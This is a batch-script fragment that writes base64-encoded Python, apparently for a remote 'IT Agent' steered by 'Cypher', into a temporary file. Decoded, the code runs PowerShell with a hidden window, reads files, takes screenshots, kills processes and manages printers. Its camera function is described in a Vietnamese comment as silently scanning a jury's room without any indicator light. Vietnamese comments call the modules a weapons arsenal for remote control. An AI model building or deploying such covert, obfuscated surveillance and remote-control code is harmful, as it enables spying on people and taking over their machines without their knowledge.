echo b64_str += "MiAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQpbV2luMzIuV2luU2hlbGxOb3RpZnldOjpTSENoYW5nZU5vdGlmeSgweDA4">> "%temp_py%"
echo b64_str += "MDAwMDAwLDAsW0ludFB0cl06Olplcm8sW0ludFB0cl06Olplcm8pCgokcnAgPSAiSEtDVTpcXFNPRlRXQVJFXFxDbGFzc2VzXFxB">> "%temp_py%"
echo b64_str += "cHBVc2VyTW9kZWxJZFxcJGFwcElkIgppZigtbm90KFRlc3QtUGF0aCAkcnApKXt7TmV3LUl0ZW0gJHJwIC1Gb3JjZXxPdXQtTnVs">> "%temp_py%"
echo b64_str += "bH19ClNldC1JdGVtUHJvcGVydHkgJHJwIC1OYW1lICdEaXNwbGF5TmFtZScgLVZhbHVlICdZaURpbmcgSVQgQWdlbnQnClNldC1J">> "%temp_py%"
echo b64_str += "dGVtUHJvcGVydHkgJHJwIC1OYW1lICdJY29uVXJpJyAgICAgLVZhbHVlICd7c3RyKGljb19wYXRoKX0nCiIiIgogICAgYXdhaXQg">> "%temp_py%"
echo b64_str += "YWN0X3Bvd2Vyc2hlbGwoc2NyaXB0LCB0aW1lb3V0PTMwKQogICAgX2F1bWlkX29rID0gVHJ1ZQoKIyDwn5ug77iPIFtLSE8gVsWo">> "%temp_py%"
echo b64_str += "IEtIw40gVMOBQyBDSEnhur5OXSAtIEPDoWMgTW9kdWxlIHRoYW8gdMO6bmcgdsOgIMSRaeG7gXUga2hp4buDbiB0aGnhur90IGLh">> "%temp_py%"
echo b64_str += "u4sgdOG7kWkgdMOibiB04burIHhhCiMgKEThu4UgaGnhu4N1OiBOxqFpIGNo4bupYSB04bqldCBj4bqjIGPDoWMgY2jhu6ljIG7E">> "%temp_py%"
echo b64_str += "g25nIHThu5FpIHTDom4gbcOgIEN5cGhlciBjw7MgdGjhu4MgxJFp4buBdSBraGnhu4NuIHThu6sgeGE6IGNo4bulcCBtw6BuIGjD">> "%temp_py%"
echo b64_str += "rG5oLCB4ZW0gZmlsZSwgY2jhuqF5IGzhu4duaCBuZ+G6p20uLi4pCmFzeW5jIGRlZiBhY3Rfc3lzdGVtX2luZm8oKToKICAgIGNw">> "%temp_py%"
echo b64_str += "dSAgPSBhd2FpdCBhc3luY2lvLnRvX3RocmVhZChwc3V0aWwuY3B1X3BlcmNlbnQsIDEpCiAgICByYW0gID0gcHN1dGlsLnZpcnR1">> "%temp_py%"
echo b64_str += "YWxfbWVtb3J5KCkucGVyY2VudAogICAgZGlzayA9IHBzdXRpbC5kaXNrX3VzYWdlKCJDOlxcIikucGVyY2VudAogICAgcmV0dXJu">> "%temp_py%"
echo b64_str += "IGYiQ1BVOiB7Y3B1fSUgfCBSQU06IHtyYW19JSB8IERpc2s6IHtkaXNrfSUiCgphc3luYyBkZWYgYWN0X3NjcmVlbnNob3QoKToK">> "%temp_py%"
echo b64_str += "ICAgIGlmIG5vdCBIQVNfTVNTOgogICAgICAgIHJldHVybiAiRXJyb3I6IG1zcyBub3QgaW5zdGFsbGVkIgogICAgZGVmIF9zaG90">> "%temp_py%"
echo b64_str += "KCk6CiAgICAgICAgaW1wb3J0IGlvCiAgICAgICAgZnJvbSBQSUwgaW1wb3J0IEltYWdlCiAgICAgICAgd2l0aCBtc3MubXNzKCkg">> "%temp_py%"
echo b64_str += "YXMgc2N0OgogICAgICAgICAgICByYXcgPSBzY3QuZ3JhYihzY3QubW9uaXRvcnNbMF0pCiAgICAgICAgICAgIGltZyA9IEltYWdl">> "%temp_py%"
echo b64_str += "LmZyb21ieXRlcygiUkdCIiwgcmF3LnNpemUsIHJhdy5iZ3JhLCAicmF3IiwgIkJHUlgiKQogICAgICAgIGlmIGltZy53aWR0aCA+">> "%temp_py%"
echo b64_str += "IDEyODA6CiAgICAgICAgICAgIGggPSBpbnQoaW1nLmhlaWdodCAqIDEyODAgLyBpbWcud2lkdGgpCiAgICAgICAgICAgIGltZyA9">> "%temp_py%"
echo b64_str += "IGltZy5yZXNpemUoKDEyODAsIGgpLCBJbWFnZS5MQU5DWk9TKQogICAgICAgIGJ1ZiA9IGlvLkJ5dGVzSU8oKQogICAgICAgIGlt">> "%temp_py%"
echo b64_str += "Zy5zYXZlKGJ1ZiwgZm9ybWF0PSJKUEVHIiwgcXVhbGl0eT04MikKICAgICAgICByZXR1cm4gYmFzZTY0LmI2NGVuY29kZShidWYu">> "%temp_py%"
echo b64_str += "Z2V0dmFsdWUoKSkuZGVjb2RlKCkKICAgIHJldHVybiBhd2FpdCBhc3luY2lvLnRvX3RocmVhZChfc2hvdCkKCmFzeW5jIGRlZiBh">> "%temp_py%"
echo b64_str += "Y3RfbGlzdF9kaXIocGF0aCk6CiAgICBkZWYgX2xpc3QoKToKICAgICAgICBwID0gUGF0aChwYXRoKQogICAgICAgIGlmIG5vdCBw">> "%temp_py%"
echo b64_str += "LmV4aXN0cygpOiByZXR1cm4ganNvbi5kdW1wcyh7ImVycm9yIjogIlBhdGggbm90IGZvdW5kIn0pCiAgICAgICAgcmV0dXJuIGpz">> "%temp_py%"
echo b64_str += "b24uZHVtcHMoWwogICAgICAgICAgICB7Im5hbWUiOiBpLm5hbWUsICJ0eXBlIjogImRpciIgaWYgaS5pc19kaXIoKSBlbHNlICJm">> "%temp_py%"
echo b64_str += "aWxlIn0KICAgICAgICAgICAgZm9yIGkgaW4gbGlzdChwLml0ZXJkaXIoKSlbOjUwXQogICAgICAgIF0pCiAgICByZXR1cm4gYXdh">> "%temp_py%"
echo b64_str += "aXQgYXN5bmNpby50b190aHJlYWQoX2xpc3QpCgphc3luYyBkZWYgYWN0X3Bvd2Vyc2hlbGwoY29tbWFuZCwgdGltZW91dD0zMCk6">> "%temp_py%"
echo b64_str += "CiAgICBkZWYgX3J1bigpOgogICAgICAgIHRyeToKICAgICAgICAgICAgc2kgPSBzdWJwcm9jZXNzLlNUQVJUVVBJTkZPKCkKICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgc2kuZHdGbGFncyB8PSBzdWJwcm9jZXNzLlNUQVJURl9VU0VTSE9XV0lORE9XCiAgICAgICAgICAgIHNpLndTaG93">> "%temp_py%"
echo b64_str += "V2luZG93ID0gMCAgIyDhuqhuIGPhu61hIHPhu5UgZMOybmcgbOG7h25oIGhvw6BuIHRvw6BuCiAgICAgICAgICAgIHIgPSBzdWJw">> "%temp_py%"
echo b64_str += "cm9jZXNzLnJ1bigKICAgICAgICAgICAgICAgIFsicG93ZXJzaGVsbCIsICItTm9Qcm9maWxlIiwgIi1Ob25JbnRlcmFjdGl2ZSIs">> "%temp_py%"
echo b64_str += "ICItQ29tbWFuZCIsIGNvbW1hbmRdLAogICAgICAgICAgICAgICAgY2FwdHVyZV9vdXRwdXQ9VHJ1ZSwgdGV4dD1UcnVlLCB0aW1l">> "%temp_py%"
echo b64_str += "b3V0PXRpbWVvdXQsCiAgICAgICAgICAgICAgICBzdGFydHVwaW5mbz1zaSwgY3JlYXRpb25mbGFncz1zdWJwcm9jZXNzLkNSRUFU">> "%temp_py%"
echo b64_str += "RV9OT19XSU5ET1csCiAgICAgICAgICAgICkKICAgICAgICAgICAgcmV0dXJuICgoci5zdGRvdXQgb3IgJycpICsgKHIuc3RkZXJy">> "%temp_py%"
echo b64_str += "IG9yICcnKSkuc3RyaXAoKQogICAgICAgIGV4Y2VwdCBzdWJwcm9jZXNzLlRpbWVvdXRFeHBpcmVkOiByZXR1cm4gIkVycm9yOiB0">> "%temp_py%"
echo b64_str += "aW1lZCBvdXQiCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOiByZXR1cm4gZiJFcnJvcjoge2V9IgogICAgcmV0dXJuIGF3">> "%temp_py%"
echo b64_str += "YWl0IGFzeW5jaW8udG9fdGhyZWFkKF9ydW4pCgphc3luYyBkZWYgYWN0X2dldF9wcm9jZXNzZXMoKToKICAgIGRlZiBfZ2V0KCk6">> "%temp_py%"
echo b64_str += "CiAgICAgICAgcHJvY3MgPSBbXQogICAgICAgIGZvciBwIGluIHBzdXRpbC5wcm9jZXNzX2l0ZXIoWyJwaWQiLCAibmFtZSIsICJj">> "%temp_py%"
echo b64_str += "cHVfcGVyY2VudCIsICJtZW1vcnlfcGVyY2VudCJdKToKICAgICAgICAgICAgdHJ5OiBwcm9jcy5hcHBlbmQocC5pbmZvKQogICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICBleGNlcHQ6IHBhc3MKICAgICAgICByZXR1cm4ganNvbi5kdW1wcyhzb3J0ZWQocHJvY3MsIGtleT1sYW1iZGEgeDog">> "%temp_py%"
echo b64_str += "eC5nZXQoImNwdV9wZXJjZW50Iikgb3IgMCwgcmV2ZXJzZT1UcnVlKVs6MzBdKQogICAgcmV0dXJuIGF3YWl0IGFzeW5jaW8udG9f">> "%temp_py%"
echo b64_str += "dGhyZWFkKF9nZXQpCgphc3luYyBkZWYgYWN0X2tpbGxfcHJvY2Vzcyh0YXJnZXQpOgogICAgdHJ5OgogICAgICAgIGlmIHN0cih0">> "%temp_py%"
echo b64_str += "YXJnZXQpLmlzZGlnaXQoKToKICAgICAgICAgICAgcHN1dGlsLlByb2Nlc3MoaW50KHRhcmdldCkpLmtpbGwoKTsgcmV0dXJuIGYi">> "%temp_py%"
echo b64_str += "S2lsbGVkIFBJRCB7dGFyZ2V0fSIKICAgICAgICBraWxsZWQgPSAwCiAgICAgICAgZm9yIHAgaW4gcHN1dGlsLnByb2Nlc3NfaXRl">> "%temp_py%"
echo b64_str += "cihbIm5hbWUiXSk6CiAgICAgICAgICAgIGlmIHAuaW5mb1sibmFtZSJdLmxvd2VyKCkgPT0gdGFyZ2V0Lmxvd2VyKCk6CiAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICBwLmtpbGwoKTsga2lsbGVkICs9IDEKICAgICAgICByZXR1cm4gZiJLaWxsZWQge2tpbGxlZH0gcHJvY2Vzcyhl">> "%temp_py%"
echo b64_str += "cykgbmFtZWQgJ3t0YXJnZXR9JyIKICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZTogcmV0dXJuIGYiRXJyb3I6IHtlfSIKCmFzeW5j">> "%temp_py%"
echo b64_str += "IGRlZiBhY3Rfb3Blbl9hcHAocGF0aCk6CiAgICB0cnk6IHN1YnByb2Nlc3MuUG9wZW4ocGF0aCk7IHJldHVybiBmIk9wZW5lZDog">> "%temp_py%"
echo b64_str += "e3BhdGh9IgogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOiByZXR1cm4gZiJFcnJvcjoge2V9IgoKYXN5bmMgZGVmIGFjdF9zZW5k">> "%temp_py%"
echo b64_str += "X25vdGlmaWNhdGlvbih0aXRsZSwgbWVzc2FnZSwgaW1hZ2VfYjY0PU5vbmUpOgogICAgYXdhaXQgX2Vuc3VyZV9hdW1pZCgpCgog">> "%temp_py%"
echo b64_str += "ICAgZGVmIF94ZShzKToKICAgICAgICByZXR1cm4gc3RyKHMpLnJlcGxhY2UoJyYnLCcmYW1wOycpLnJlcGxhY2UoJzwnLCcmbHQ7">> "%temp_py%"
echo b64_str += "JykucmVwbGFjZSgnPicsJyZndDsnKS5yZXBsYWNlKCciJywnJnF1b3Q7JykucmVwbGFjZSgiJyIsIiZhcG9zOyIpCgogICAgIyDh">> "%temp_py%"
echo b64_str += "uqJuaCDEkeG6oWkgZGnhu4duIHPhur9wIG5naGnDqm0ga2jhuq9jIENoaSBDaGkgaGnhu4NuIHRo4buLIGPhuqFuaCB0acOqdSDE">> "%temp_py%"
echo b64_str += "keG7gSDEkeG7gyBjw6FjIEFnZW50IHThu7EgxJHhu5luZyByw6luCiAgICBhdmF0YXIgPSBCQVNFX0RJUiAvICJjaGljaGkucG5n">> "%temp_py%"
echo b64_str += "IgogICAgaWYgbm90IGF2YXRhci5leGlzdHMoKToKICAgICAgICBhdmF0YXIgPSBCQVNFX0RJUiAvICJjaGljaGkuanBnIgoKICAg">> "%temp_py%"
echo b64_str += "IGF2YXRhcl90YWcgPSAiIgogICAgaWYgYXZhdGFyLmV4aXN0cygpOgogICAgICAgIHVyaSA9IHN0cihhdmF0YXIpLnJlcGxhY2Uo">> "%temp_py%"
echo b64_str += "J1xcJywgJy8nKS5yZXBsYWNlKCcgJywgJyUyMCcpCiAgICAgICAgYXZhdGFyX3RhZyA9IGYnPGltYWdlIHBsYWNlbWVudD0iYXBw">> "%temp_py%"
echo b64_str += "TG9nb092ZXJyaWRlIiBzcmM9ImZpbGU6Ly8ve3VyaX0iLz4nCgogICAgIyDhuqJuaCDEkcOtbmgga8OobSBs4bubbiBj4bqleSB0">> "%temp_py%"
echo b64_str += "4burIHRydW5nIHTDom0gxJFp4buBdSBraGnhu4NuCiAgICBoZXJvX3RhZyA9ICIiCiAgICBfdG1wX2ltZyA9IE5vbmUKICAgIGlm">> "%temp_py%"
echo b64_str += "IGltYWdlX2I2NDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIGltcG9ydCB0ZW1wZmlsZSwgYmFzZTY0IGFzIF9iNjQKICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgaW1nX2J5dGVzID0gX2I2NC5iNjRkZWNvZGUoaW1hZ2VfYjY0KQogICAgICAgICAgICBleHQgPSAiLnBuZyIgaWYgaW1n">> "%temp_py%"
echo b64_str += "X2J5dGVzWzo0XSA9PSBiJ1x4ODlQTkcnIGVsc2UgIi5qcGciCiAgICAgICAgICAgIF90bXBfaW1nID0gUGF0aCh0ZW1wZmlsZS5t">> "%temp_py%"
echo b64_str += "a3RlbXAoc3VmZml4PWV4dCwgZGlyPUJBU0VfRElSKSkKICAgICAgICAgICAgX3RtcF9pbWcud3JpdGVfYnl0ZXMoaW1nX2J5dGVz">> "%temp_py%"
echo b64_str += "KQogICAgICAgICAgICB1cmkzID0gc3RyKF90bXBfaW1nKS5yZXBsYWNlKCdcXCcsICcvJykucmVwbGFjZSgnICcsICclMjAnKQog">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICBoZXJvX3RhZyA9IGYnPGltYWdlIHBsYWNlbWVudD0iaGVybyIgc3JjPSJmaWxlOi8vL3t1cmkzfSIvPicKICAg">> "%temp_py%"
echo b64_str += "ICAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgICAgICBoZXJvX3RhZyA9ICIiCgogICAgeG1sX2JvZHkgPSAoCiAgICAgICAg">> "%temp_py%"
echo b64_str += "Zic8dG9hc3Q+PHZpc3VhbD48YmluZGluZyB0ZW1wbGF0ZT0iVG9hc3RHZW5lcmljIj4nCiAgICAgICAgZid7aGVyb190YWd9Jwog">> "%temp_py%"
echo b64_str += "ICAgICAgIGYne2F2YXRhcl90YWd9JwogICAgICAgIGYnPHRleHQ+e194ZSh0aXRsZSl9PC90ZXh0PicKICAgICAgICBmJzx0ZXh0">> "%temp_py%"
echo b64_str += "PntfeGUobWVzc2FnZSl9PC90ZXh0PicKICAgICAgICBmJzwvYmluZGluZz48L3Zpc3VhbD48L3RvYXN0PicKICAgICkKICAgIHht">> "%temp_py%"
echo b64_str += "bF9wcyA9IHhtbF9ib2R5LnJlcGxhY2UoIiciLCAiJyciKQoKICAgIHNjcmlwdCA9ICJcbiIuam9pbihbCiAgICAgICAgIlt2b2lk">> "%temp_py%"
echo b64_str += "XVtXaW5kb3dzLlVJLk5vdGlmaWNhdGlvbnMuVG9hc3ROb3RpZmljYXRpb25NYW5hZ2VyLFdpbmRvd3MuVUkuTm90aWZpY2F0aW9u">> "%temp_py%"
echo b64_str += "cyxDb250ZW50VHlwZT1XaW5kb3dzUnVudGltZV0iLAogICAgICAgICJbdm9pZF1bV2luZG93cy5EYXRhLlhtbC5Eb20uWG1sRG9j">> "%temp_py%"
echo b64_str += "dW1lbnQsV2luZG93cy5EYXRhLlhtbC5Eb20uWG1sRG9jdW1lbnQsQ29udGVudFR5cGU9V2luZG93c1J1bnRpbWVdIiwKICAgICAg">> "%temp_py%"
echo b64_str += "ICAiJGQ9TmV3LU9iamVjdCBXaW5kb3dzLkRhdGEuWG1sLkRvbS5YbWxEb2N1bWVudCIsCiAgICAgICAgZiIkZC5Mb2FkWG1sKCd7">> "%temp_py%"
echo b64_str += "eG1sX3BzfScpIiwKICAgICAgICAiW1dpbmRvd3MuVUkuTm90aWZpY2F0aW9ucy5Ub2FzdE5vdGlmaWNhdGlvbk1hbmFnZXJdOjpD">> "%temp_py%"
echo b64_str += "cmVhdGVUb2FzdE5vdGlmaWVyKCdZaURpbmcuSVRBZ2VudCcpLlNob3coKE5ldy1PYmplY3QgV2luZG93cy5VSS5Ob3RpZmljYXRp">> "%temp_py%"
echo b64_str += "b25zLlRvYXN0Tm90aWZpY2F0aW9uICRkKSkiLAogICAgXSkKICAgIHJlc3VsdCA9IGF3YWl0IGFjdF9wb3dlcnNoZWxsKHNjcmlw">> "%temp_py%"
echo b64_str += "dCwgdGltZW91dD0xMikKICAgIGlmIF90bXBfaW1nIGFuZCBfdG1wX2ltZy5leGlzdHMoKToKICAgICAgICB0cnk6IF90bXBfaW1n">> "%temp_py%"
echo b64_str += "LnVubGluaygpCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbjogcGFzcwogICAgaWYgcmVzdWx0Lmxvd2VyKCkuc3RhcnRzd2l0aCgi">> "%temp_py%"
echo b64_str += "ZXJyb3IiKTogcmV0dXJuIHJlc3VsdAogICAgcmV0dXJuIGYixJDDoyBn4butaToge21lc3NhZ2V9IgoKYXN5bmMgZGVmIGFjdF9u">> "%temp_py%"
echo b64_str += "ZXR3b3JrX2luZm8oKToKICAgIGRlZiBfZ2V0KCk6CiAgICAgICAgaCA9IHNvY2tldC5nZXRob3N0bmFtZSgpCiAgICAgICAgdHJ5">> "%temp_py%"
echo b64_str += "OiBpcCA9IHNvY2tldC5nZXRob3N0YnluYW1lKGgpCiAgICAgICAgZXhjZXB0OiBpcCA9ICJ1bmtub3duIgogICAgICAgIHJldHVy">> "%temp_py%"
echo b64_str += "biBqc29uLmR1bXBzKHsiaG9zdG5hbWUiOiBoLCAiaXAiOiBpcH0pCiAgICByZXR1cm4gYXdhaXQgYXN5bmNpby50b190aHJlYWQo">> "%temp_py%"
echo b64_str += "X2dldCkKCmFzeW5jIGRlZiBhY3RfcmVhZF9maWxlKHBhdGgpOgogICAgdHJ5OiByZXR1cm4gUGF0aChwYXRoKS5yZWFkX3RleHQo">> "%temp_py%"
echo b64_str += "ZW5jb2Rpbmc9InV0Zi04IiwgZXJyb3JzPSJpZ25vcmUiKVs6NTAwMF0KICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZTogcmV0dXJu">> "%temp_py%"
echo b64_str += "IGYiRXJyb3I6IHtlfSIKCmFzeW5jIGRlZiBhY3RfY2FwdHVyZV9jYW1lcmEoY2FtZXJhX2luZGV4PTApOgogICAgIiIiTeG7nyBj">> "%temp_py%"
echo b64_str += "YW1lcmEgw6JtIHRo4bqnbSBxdcOpdCBraMO0bmcgZ2lhbiBwaMOybmcgY+G7p2EgYmFuIGdpw6FtIGto4bqjbyDigJQga2jDtG5n">> "%temp_py%"
echo b64_str += "IGLhuq10IMSRw6huIGPhuqNuaCBiw6FvLCBraMO0bmcgaGnhu4duIG3DoG4gaMOsbmguIiIiCiAgICBkZWYgX2NhcHR1cmUoKToK">> "%temp_py%"
echo b64_str += "ICAgICAgICB0cnk6CiAgICAgICAgICAgIGltcG9ydCBjdjIKICAgICAgICBleGNlcHQgSW1wb3J0RXJyb3I6CiAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "IHJldHVybiAiRXJyb3I6IG9wZW5jdi1weXRob24gbm90IGluc3RhbGxlZCIKICAgICAgICB0cnk6CiAgICAgICAgICAgIGNhcCA9">> "%temp_py%"
echo b64_str += "IGN2Mi5WaWRlb0NhcHR1cmUoY2FtZXJhX2luZGV4LCBjdjIuQ0FQX0RTSE9XKQogICAgICAgICAgICBpZiBub3QgY2FwLmlzT3Bl">> "%temp_py%"
echo b64_str += "bmVkKCk6CiAgICAgICAgICAgICAgICByZXR1cm4gIkVycm9yOiBjYW1lcmEgbm90IGZvdW5kIG9yIGluIHVzZSIKICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgY2FwLnJlYWQoKQogICAgICAgICAgICByZXQsIGZyYW1lID0gY2FwLnJlYWQoKQogICAgICAgICAgICBjYXAucmVsZWFzZSgp">> "%temp_py%"
echo b64_str += "CiAgICAgICAgICAgIGlmIG5vdCByZXQgb3IgZnJhbWUgaXMgTm9uZToKICAgICAgICAgICAgICAgIHJldHVybiAiRXJyb3I6IGNv">> "%temp_py%"
echo b64_str += "dWxkIG5vdCBjYXB0dXJlIGZyYW1lIgogICAgICAgICAgICBvaywgYnVmID0gY3YyLmltZW5jb2RlKCcuanBnJywgZnJhbWUsIFtj">> "%temp_py%"
echo b64_str += "djIuSU1XUklURV9KUEVHX1FVQUxJVFksIDkwXSkKICAgICAgICAgICAgaWYgbm90IG9rOgogICAgICAgICAgICAgICAgcmV0dXJu">> "%temp_py%"
echo b64_str += "ICJFcnJvcjogZW5jb2RlIGZhaWxlZCIKICAgICAgICAgICAgcmV0dXJuIGJhc2U2NC5iNjRlbmNvZGUoYnVmLnRvYnl0ZXMoKSku">> "%temp_py%"
echo b64_str += "ZGVjb2RlKCkKICAgICAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgICAgIHJldHVybiBmIkVycm9yOiB7ZX0iCiAg">> "%temp_py%"
echo b64_str += "ICByZXR1cm4gYXdhaXQgYXN5bmNpby50b190aHJlYWQoX2NhcHR1cmUpCgphc3luYyBkZWYgYWN0X3NhdmVfYXZhdGFyKGRhdGEp">> "%temp_py%"
echo b64_str += "OgogICAgdHJ5OgogICAgICAgIGltZ19ieXRlcyA9IGJhc2U2NC5iNjRkZWNvZGUoZGF0YSkKICAgICAgICBpc19wbmcgPSBsZW4o">> "%temp_py%"
echo b64_str += "aW1nX2J5dGVzKSA+PSA0IGFuZCBpbWdfYnl0ZXNbOjRdID09IGInXHg4OVBORycKICAgICAgICBvdXQgPSBCQVNFX0RJUiAvICgi">> "%temp_py%"
echo b64_str += "Y2hpY2hpLnBuZyIgaWYgaXNfcG5nIGVsc2UgImNoaWNoaS5qcGciKQogICAgICAgIG91dC53cml0ZV9ieXRlcyhpbWdfYnl0ZXMp">> "%temp_py%"
echo b64_str += "CiAgICAgICAgb3RoZXIgPSBCQVNFX0RJUiAvICgiY2hpY2hpLmpwZyIgaWYgaXNfcG5nIGVsc2UgImNoaWNoaS5wbmciKQogICAg">> "%temp_py%"
echo b64_str += "ICAgIGlmIG90aGVyLmV4aXN0cygpOiBvdGhlci51bmxpbmsobWlzc2luZ19vaz1UcnVlKQogICAgICAgIHJldHVybiBmIkF2YXRh">> "%temp_py%"
echo b64_str += "ciBzYXZlZCAoe2xlbihpbWdfYnl0ZXMpfSBieXRlcywgeydQTkcnIGlmIGlzX3BuZyBlbHNlICdKUEVHJ30pIgogICAgZXhjZXB0">> "%temp_py%"
echo b64_str += "IEV4Y2VwdGlvbiBhcyBlOiByZXR1cm4gZiJFcnJvcjoge2V9IgoKIyDwn5ao77iPIFtNT0RVTEUgVEhBTyBUw5pORyBNw4FZIElO">> "%temp_py%"
echo b64_str += "XSAtIMOJcCBo4buHIHRo4buRbmcgbcOheSBpbiBob+G6oXQgxJHhu5luZyB0aGVvIMO9IGNow60gY+G7p2EgQ3lwaGVyCiMgKETh">> "%temp_py%"
echo b64_str += "u4UgaGnhu4N1OiBHacO6cCBDeXBoZXIgY8OzIHRo4buDIHThu7EgZG8gbGnhu4d0IGvDqiBtw6F5IGluLCBraeG7g20gc2/DoXQg">> "%temp_py%"
echo b64_str += "aMOgbmcgxJHhu6NpLCB4w7NhIGzhu4duaCBob+G6t2Mgw6lwIG3DoXkgaW4gcGh1biB0csOgbyBk4buvIGxp4buHdSBpbiDhuqVu">> "%temp_py%"
echo b64_str += "IGPDoWMgdGjDtG5nIMSRaeG7h3AgY2jDom0gY2jhu41jKQphc3luYyBkZWYgYWN0X2xpc3RfcHJpbnRlcnMoKToKICAgIHIgPSBh">> "%temp_py%"
echo b64_str += "d2FpdCBhY3RfcG93ZXJzaGVsbCgKICAgICAgICAiR2V0LVByaW50ZXIgfCBTZWxlY3QtT2JqZWN0IE5hbWUsIgogICAgICAgICJA">> "%temp_py%"
echo b64_str += "e049J1N0YXR1cyc7RT17JF8uUHJpbnRlclN0YXR1cy5Ub1N0cmluZygpfX0sIgogICAgICAgICJEZWZhdWx0LFBvcnROYW1lIHwg">> "%temp_py%"
echo b64_str += "Q29udmVydFRvLUpzb24gLUNvbXByZXNzIiwKICAgICAgICB0aW1lb3V0PTEyCiAgICApCiAgICByZXR1cm4gciBvciAiW10iCgph">> "%temp_py%"
echo b64_str += "c3luYyBkZWYgYWN0X2dldF9wcmludF9xdWV1ZSgpOgogICAgciA9IGF3YWl0IGFjdF9wb3dlcnNoZWxsKAogICAgICAgICIkam9i">> "%temp_py%"
echo b64_str += "cz1AKCk7IEdldC1QcmludGVyIHwgRm9yRWFjaC1PYmplY3QgeyIKICAgICAgICAiIHRyeSB7ICRqb2JzICs9IEdldC1QcmludEpv">> "%temp_py%"
echo b64_str += "YiAtUHJpbnRlck5hbWUgJF8uTmFtZSAtRUEgU3RvcCB9IGNhdGNoIHt9IH07IgogICAgICAgICJpZigkam9icyl7ICRqb2JzIHwg">> "%temp_py%"
echo b64_str += "U2VsZWN0LU9iamVjdCBKb2JTdGF0dXMsRG9jdW1lbnQsVXNlck5hbWUsVG90YWxQYWdlcyB8IENvbnZlcnRUby1Kc29uIC1Db21w">> "%temp_py%"
echo b64_str += "cmVzcyB9IgogICAgICAgICJlbHNlIHsgJ1tdJyB9IiwKICAgICAgICB0aW1lb3V0PTEyCiAgICApCiAgICByZXR1cm4gci5zdHJp">> "%temp_py%"
echo b64_str += "cCgpIG9yICJbXSIKCmFzeW5jIGRlZiBhY3RfY2xlYXJfcHJpbnRfcXVldWUocHJpbnRlcj0iIik6CiAgICBpZiBwcmludGVyOgog">> "%temp_py%"
echo b64_str += "ICAgICAgIGNtZCA9IGYiR2V0LVByaW50Sm9iIC1QcmludGVyTmFtZSAne3ByaW50ZXJ9JyB8IFJlbW92ZS1QcmludEpvYjsgJ0Ns">> "%temp_py%"
echo b64_str += "ZWFyZWQ6IHtwcmludGVyfSciCiAgICBlbHNlOgogICAgICAgIGNtZCA9ICgiJG49MDsgR2V0LVByaW50ZXIgfCBGb3JFYWNoLU9i">> "%temp_py%"
echo b64_str += "amVjdCB7ICIKICAgICAgICAgICAgICAgInRyeSB7IEdldC1QcmludEpvYiAtUHJpbnRlck5hbWUgJF8uTmFtZSAtRUEgU3RvcCB8">> "%temp_py%"
echo b64_str += "IEZvckVhY2gtT2JqZWN0IHsgUmVtb3ZlLVByaW50Sm9iICRfOyAkbisrIH0gfSBjYXRjaCB7fSB9OyIKICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "IlwiQ2xlYXJlZCAkbiBqb2IocylcIiIpCiAgICByZXR1cm4gYXdhaXQgYWN0X3Bvd2Vyc2hlbGwoY21kLCB0aW1lb3V0PTE1KQoK">> "%temp_py%"
echo b64_str += "YXN5bmMgZGVmIGFjdF9zZXRfZGVmYXVsdF9wcmludGVyKG5hbWUpOgogICAgY21kID0gZiIoTmV3LU9iamVjdCAtQ29tT2JqZWN0">> "%temp_py%"
echo b64_str += "IFdTY3JpcHQuTmV0d29yaykuU2V0RGVmYXVsdFByaW50ZXIoJ3tuYW1lfScpOyAnRGVmYXVsdCBzZXQ6IHtuYW1lfSciCiAgICBy">> "%temp_py%"
echo b64_str += "ZXR1cm4gYXdhaXQgYWN0X3Bvd2Vyc2hlbGwoY21kLCB0aW1lb3V0PTEwKQoKYXN5bmMgZGVmIGFjdF9pbnN0YWxsX3ByaW50ZXJf">> "%temp_py%"
echo b64_str += "aXAoaXAsIG5hbWUsIGRyaXZlcj0iR2VuZXJpYyAvIFRleHQgT25seSIpOgogICAgaWYgbm90IGlwIG9yIG5vdCBuYW1lOgogICAg">> "%temp_py%"
echo b64_str += "ICAgIHJldHVybiAiRXJyb3I6IGlwIGFuZCBuYW1lIHJlcXVpcmVkIgogICAgc2FmZV9pcCAgID0gaXAucmVwbGFjZSgiJyIsICIi">> "%temp_py%"
echo b64_str += "KQogICAgc2FmZV9uYW1lID0gbmFtZS5yZXBsYWNlKCInIiwgIiIpCiAgICBzYWZlX2RydiAgPSBkcml2ZXIucmVwbGFjZSgiJyIs">> "%temp_py%"
echo b64_str += "ICIiKQogICAgY21kID0gKAogICAgICAgIGYiJHBvcnQ9J3tzYWZlX2lwfSc7ICRwbmFtZT0ne3NhZmVfbmFtZX0nOyAkZHJ2PSd7">> "%temp_py%"
echo b64_str += "c2FmZV9kcnZ9JzsiCiAgICAgICAgZiJpZigtbm90KEdldC1QcmludGVyUG9ydCAtTmFtZSAkcG9ydCAtRUEgU2lsZW50bHlDb250">> "%temp_py%"
echo b64_str += "aW51ZSkpe3siCiAgICAgICAgZiIgIEFkZC1QcmludGVyUG9ydCAtTmFtZSAkcG9ydCAtUHJpbnRlckhvc3RBZGRyZXNzICRwb3J0">> "%temp_py%"
echo b64_str += "IH19IgogICAgICAgIGYiaWYoLW5vdChHZXQtUHJpbnRlciAtTmFtZSAkcG5hbWUgLUVBIFNpbGVudGx5Q29udGludWUpKXt7Igog">> "%temp_py%"
echo b64_str += "ICAgICAgIGYiICBBZGQtUHJpbnRlciAtTmFtZSAkcG5hbWUgLURyaXZlck5hbWUgJGRydiAtUG9ydE5hbWUgJHBvcnQgfX0iCiAg">> "%temp_py%"
